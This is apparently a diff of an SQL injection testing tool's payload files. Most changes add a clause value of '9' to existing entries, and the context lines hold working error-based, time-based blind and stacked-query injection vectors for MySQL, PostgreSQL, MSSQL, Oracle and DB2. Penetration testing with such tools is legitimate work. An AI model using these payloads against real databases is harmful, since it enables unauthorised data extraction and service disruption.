|
|||
<stype>2</stype>
|
||||
<level>3</level>
|
||||
<risk>3</risk>
|
||||
<clause>1</clause>
|
||||
<clause>1,9</clause>
|
||||
<where>2</where>
|
||||
<vector>OR 1 GROUP BY CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0)</vector>
|
||||
<request>
|
||||
|
@ -313,7 +313,7 @@
|
|||
<stype>2</stype>
|
||||
<level>1</level>
|
||||
<risk>1</risk>
|
||||
<clause>1</clause>
|
||||
<clause>1,9</clause>
|
||||
<where>1</where>
|
||||
<vector>AND [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)</vector>
|
||||
<request>
|
||||
|
@ -332,7 +332,7 @@
|
|||
<stype>2</stype>
|
||||
<level>1</level>
|
||||
<risk>3</risk>
|
||||
<clause>1</clause>
|
||||
<clause>1,9</clause>
|
||||
<where>2</where>
|
||||
<vector>OR [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)</vector>
|
||||
<request>
|
||||
|
@ -351,7 +351,7 @@
|
|||
<stype>2</stype>
|
||||
<level>1</level>
|
||||
<risk>1</risk>
|
||||
<clause>1</clause>
|
||||
<clause>1,9</clause>
|
||||
<where>1</where>
|
||||
<vector>AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
|
||||
<request>
|
||||
|
@ -372,7 +372,7 @@
|
|||
<stype>2</stype>
|
||||
<level>1</level>
|
||||
<risk>3</risk>
|
||||
<clause>1</clause>
|
||||
<clause>1,9</clause>
|
||||
<where>2</where>
|
||||
<vector>OR [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
|
||||
<request>
|
||||
|
@ -393,7 +393,7 @@
|
|||
<stype>2</stype>
|
||||
<level>2</level>
|
||||
<risk>1</risk>
|
||||
<clause>1</clause>
|
||||
<clause>1,9</clause>
|
||||
<where>1</where>
|
||||
<vector>AND [RANDNUM] IN (('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
|
||||
<request>
|
||||
|
@ -414,7 +414,7 @@
|
|||
<stype>2</stype>
|
||||
<level>2</level>
|
||||
<risk>3</risk>
|
||||
<clause>1</clause>
|
||||
<clause>1,9</clause>
|
||||
<where>2</where>
|
||||
<vector>OR [RANDNUM] IN (('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))</vector>
|
||||
<request>
|
||||
|
@ -435,7 +435,7 @@
|
|||
<stype>2</stype>
|
||||
<level>1</level>
|
||||
<risk>1</risk>
|
||||
<clause>1</clause>
|
||||
<clause>1,9</clause>
|
||||
<where>1</where>
|
||||
<vector>AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'),'#','[HASH_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
|
||||
<request>
|
||||
|
@ -454,7 +454,7 @@
|
|||
<stype>2</stype>
|
||||
<level>1</level>
|
||||
<risk>3</risk>
|
||||
<clause>1</clause>
|
||||
<clause>1,9</clause>
|
||||
<where>2</where>
|
||||
<vector>OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>
|
||||
<request>
|
||||
|
@ -473,7 +473,7 @@
|
|||
<stype>2</stype>
|
||||
<level>2</level>
|
||||
<risk>1</risk>
|
||||
<clause>1</clause>
|
||||
<clause>1,9</clause>
|
||||
<where>1</where>
|
||||
<vector>AND [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
|
||||
<request>
|
||||
|
@ -493,7 +493,7 @@
|
|||
<stype>2</stype>
|
||||
<level>2</level>
|
||||
<risk>3</risk>
|
||||
<clause>1</clause>
|
||||
<clause>1,9</clause>
|
||||
<where>2</where>
|
||||
<vector>OR [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
|
||||
<request>
|
||||
|
@ -513,7 +513,7 @@
|
|||
<stype>2</stype>
|
||||
<level>3</level>
|
||||
<risk>1</risk>
|
||||
<clause>1</clause>
|
||||
<clause>1,9</clause>
|
||||
<where>1</where>
|
||||
<vector>AND [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],'[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
|
||||
<request>
|
||||
|
@ -532,7 +532,7 @@
|
|||
<stype>2</stype>
|
||||
<level>3</level>
|
||||
<risk>3</risk>
|
||||
<clause>1</clause>
|
||||
<clause>1,9</clause>
|
||||
<where>2</where>
|
||||
<vector>OR [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],'[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
|
||||
<request>
|
||||
|
@ -551,7 +551,7 @@
|
|||
<stype>2</stype>
|
||||
<level>4</level>
|
||||
<risk>1</risk>
|
||||
<clause>1</clause>
|
||||
<clause>1,9</clause>
|
||||
<where>1</where>
|
||||
<vector>AND [RANDNUM]=DBMS_UTILITY.SQLID_TO_SQLHASH('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
|
||||
<request>
|
||||
|
@ -570,7 +570,7 @@
|
|||
<stype>2</stype>
|
||||
<level>4</level>
|
||||
<risk>3</risk>
|
||||
<clause>1</clause>
|
||||
<clause>1,9</clause>
|
||||
<where>2</where>
|
||||
<vector>OR [RANDNUM]=DBMS_UTILITY.SQLID_TO_SQLHASH('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
|
||||
<request>
|
||||
|
@ -589,7 +589,7 @@
|
|||
<stype>2</stype>
|
||||
<level>3</level>
|
||||
<risk>1</risk>
|
||||
<clause>1</clause>
|
||||
<clause>1,9</clause>
|
||||
<where>1</where>
|
||||
<vector>AND [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
|
||||
<request>
|
||||
|
@ -608,7 +608,7 @@
|
|||
<stype>2</stype>
|
||||
<level>3</level>
|
||||
<risk>3</risk>
|
||||
<clause>1</clause>
|
||||
<clause>1,9</clause>
|
||||
<where>2</where>
|
||||
<vector>OR [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>
|
||||
<request>
|
||||
|
@ -655,7 +655,7 @@
|
|||
<stype>2</stype>
|
||||
<level>1</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>3</where>
|
||||
<vector>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)</vector>
|
||||
<request>
|
||||
|
@ -679,7 +679,7 @@
|
|||
<stype>2</stype>
|
||||
<level>3</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>3</where>
|
||||
<vector>(EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')))</vector>
|
||||
<request>
|
||||
|
@ -703,7 +703,7 @@
|
|||
<stype>2</stype>
|
||||
<level>4</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>3</where>
|
||||
<vector>(UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1]))</vector>
|
||||
<request>
|
||||
|
@ -727,7 +727,7 @@
|
|||
<stype>2</stype>
|
||||
<level>5</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>3</where>
|
||||
<vector>EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))x))</vector>
|
||||
<request>
|
||||
|
@ -747,7 +747,7 @@
|
|||
<stype>2</stype>
|
||||
<level>5</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>3</where>
|
||||
<vector>(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>
|
||||
<request>
|
||||
|
@ -771,7 +771,7 @@
|
|||
<stype>2</stype>
|
||||
<level>2</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>3</where>
|
||||
<vector>(CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC))</vector>
|
||||
<request>
|
||||
|
@ -790,7 +790,7 @@
|
|||
<stype>2</stype>
|
||||
<level>5</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>3</where>
|
||||
<vector>(CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC))</vector>
|
||||
<request>
|
||||
|
|
|
@ -450,7 +450,7 @@
|
|||
<stype>5</stype>
|
||||
<level>3</level>
|
||||
<risk>2</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])</vector>
|
||||
<request>
|
||||
|
@ -470,7 +470,7 @@
|
|||
<stype>5</stype>
|
||||
<level>5</level>
|
||||
<risk>2</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])</vector>
|
||||
<request>
|
||||
|
@ -571,7 +571,7 @@
|
|||
<stype>5</stype>
|
||||
<level>4</level>
|
||||
<risk>2</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>;SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3</vector>
|
||||
<request>
|
||||
|
@ -591,7 +591,7 @@
|
|||
<stype>5</stype>
|
||||
<level>5</level>
|
||||
<risk>2</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>;SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3</vector>
|
||||
<request>
|
||||
|
|
|
@ -7,7 +7,7 @@
|
|||
<stype>5</stype>
|
||||
<level>1</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
|
||||
<request>
|
||||
|
@ -27,7 +27,7 @@
|
|||
<stype>5</stype>
|
||||
<level>1</level>
|
||||
<risk>3</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
|
||||
<request>
|
||||
|
@ -47,7 +47,7 @@
|
|||
<stype>5</stype>
|
||||
<level>3</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
|
||||
<request>
|
||||
|
@ -68,7 +68,7 @@
|
|||
<stype>5</stype>
|
||||
<level>3</level>
|
||||
<risk>3</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
|
||||
<request>
|
||||
|
@ -89,7 +89,7 @@
|
|||
<stype>5</stype>
|
||||
<level>2</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
|
||||
<request>
|
||||
|
@ -109,7 +109,7 @@
|
|||
<stype>5</stype>
|
||||
<level>2</level>
|
||||
<risk>3</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
|
||||
<request>
|
||||
|
@ -129,7 +129,7 @@
|
|||
<stype>5</stype>
|
||||
<level>4</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
|
||||
<request>
|
||||
|
@ -150,7 +150,7 @@
|
|||
<stype>5</stype>
|
||||
<level>4</level>
|
||||
<risk>3</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
|
||||
<request>
|
||||
|
@ -171,7 +171,7 @@
|
|||
<stype>5</stype>
|
||||
<level>2</level>
|
||||
<risk>2</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
|
||||
<request>
|
||||
|
@ -191,7 +191,7 @@
|
|||
<stype>5</stype>
|
||||
<level>2</level>
|
||||
<risk>3</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>OR [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
|
||||
<request>
|
||||
|
@ -211,7 +211,7 @@
|
|||
<stype>5</stype>
|
||||
<level>5</level>
|
||||
<risk>2</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
|
||||
<request>
|
||||
|
@ -232,7 +232,7 @@
|
|||
<stype>5</stype>
|
||||
<level>5</level>
|
||||
<risk>3</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>OR [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
|
||||
<request>
|
||||
|
@ -253,7 +253,7 @@
|
|||
<stype>5</stype>
|
||||
<level>2</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
|
||||
<request>
|
||||
|
@ -273,7 +273,7 @@
|
|||
<stype>5</stype>
|
||||
<level>4</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
|
||||
<request>
|
||||
|
@ -294,7 +294,7 @@
|
|||
<stype>5</stype>
|
||||
<level>5</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>RLIKE (SELECT [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]))</vector>
|
||||
<request>
|
||||
|
@ -314,7 +314,7 @@
|
|||
<stype>5</stype>
|
||||
<level>5</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>RLIKE (SELECT [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]))</vector>
|
||||
<request>
|
||||
|
@ -335,7 +335,7 @@
|
|||
<stype>5</stype>
|
||||
<level>3</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>AND ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>
|
||||
<request>
|
||||
|
@ -355,7 +355,7 @@
|
|||
<stype>5</stype>
|
||||
<level>3</level>
|
||||
<risk>3</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>OR ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>
|
||||
<request>
|
||||
|
@ -374,7 +374,7 @@
|
|||
<stype>5</stype>
|
||||
<level>5</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>AND ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>
|
||||
<request>
|
||||
|
@ -394,7 +394,7 @@
|
|||
<stype>5</stype>
|
||||
<level>5</level>
|
||||
<risk>3</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>OR ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>
|
||||
<request>
|
||||
|
@ -414,7 +414,7 @@
|
|||
<stype>5</stype>
|
||||
<level>1</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
|
||||
<request>
|
||||
|
@ -434,7 +434,7 @@
|
|||
<stype>5</stype>
|
||||
<level>1</level>
|
||||
<risk>3</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
|
||||
<request>
|
||||
|
@ -454,7 +454,7 @@
|
|||
<stype>5</stype>
|
||||
<level>4</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
|
||||
<request>
|
||||
|
@ -475,7 +475,7 @@
|
|||
<stype>5</stype>
|
||||
<level>4</level>
|
||||
<risk>3</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
|
||||
<request>
|
||||
|
@ -496,7 +496,7 @@
|
|||
<stype>5</stype>
|
||||
<level>2</level>
|
||||
<risk>2</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
|
||||
<request>
|
||||
|
@ -515,7 +515,7 @@
|
|||
<stype>5</stype>
|
||||
<level>2</level>
|
||||
<risk>3</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
|
||||
<request>
|
||||
|
@ -534,7 +534,7 @@
|
|||
<stype>5</stype>
|
||||
<level>5</level>
|
||||
<risk>2</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
|
||||
<request>
|
||||
|
@ -554,7 +554,7 @@
|
|||
<stype>5</stype>
|
||||
<level>5</level>
|
||||
<risk>3</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
|
||||
<request>
|
||||
|
@ -617,7 +617,7 @@
|
|||
<stype>5</stype>
|
||||
<level>2</level>
|
||||
<risk>2</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)</vector>
|
||||
<request>
|
||||
|
@ -638,7 +638,7 @@
|
|||
<stype>5</stype>
|
||||
<level>2</level>
|
||||
<risk>3</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)</vector>
|
||||
<request>
|
||||
|
@ -659,7 +659,7 @@
|
|||
<stype>5</stype>
|
||||
<level>5</level>
|
||||
<risk>2</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)</vector>
|
||||
<request>
|
||||
|
@ -681,7 +681,7 @@
|
|||
<stype>5</stype>
|
||||
<level>5</level>
|
||||
<risk>3</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)</vector>
|
||||
<request>
|
||||
|
@ -703,7 +703,7 @@
|
|||
<stype>5</stype>
|
||||
<level>1</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>
|
||||
<request>
|
||||
|
@ -722,7 +722,7 @@
|
|||
<stype>5</stype>
|
||||
<level>1</level>
|
||||
<risk>3</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>
|
||||
<request>
|
||||
|
@ -741,7 +741,7 @@
|
|||
<stype>5</stype>
|
||||
<level>4</level>
|
||||
<risk>1</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>
|
||||
<request>
|
||||
|
@ -761,7 +761,7 @@
|
|||
<stype>5</stype>
|
||||
<level>4</level>
|
||||
<risk>3</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>
|
||||
<request>
|
||||
|
@ -781,7 +781,7 @@
|
|||
<stype>5</stype>
|
||||
<level>2</level>
|
||||
<risk>2</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>
|
||||
<request>
|
||||
|
@ -800,7 +800,7 @@
|
|||
<stype>5</stype>
|
||||
<level>2</level>
|
||||
<risk>3</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>
|
||||
<request>
|
||||
|
@ -819,7 +819,7 @@
|
|||
<stype>5</stype>
|
||||
<level>5</level>
|
||||
<risk>2</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>
|
||||
<request>
|
||||
|
@ -839,7 +839,7 @@
|
|||
<stype>5</stype>
|
||||
<level>5</level>
|
||||
<risk>3</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>
|
||||
<request>
|
||||
|
@ -859,7 +859,7 @@
|
|||
<stype>5</stype>
|
||||
<level>3</level>
|
||||
<risk>2</risk>
|
||||
<clause>1,2,3</clause>
|
||||
<clause>1,2,3,9</clause>
|
||||
<where>1</where>
|
||||
<vector>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>
|
||||
<request>
|
||||
|
@ -878,7 +878,7 @@
|
|||
<stype>5</stype>
|
||||
<level>3</level>
|
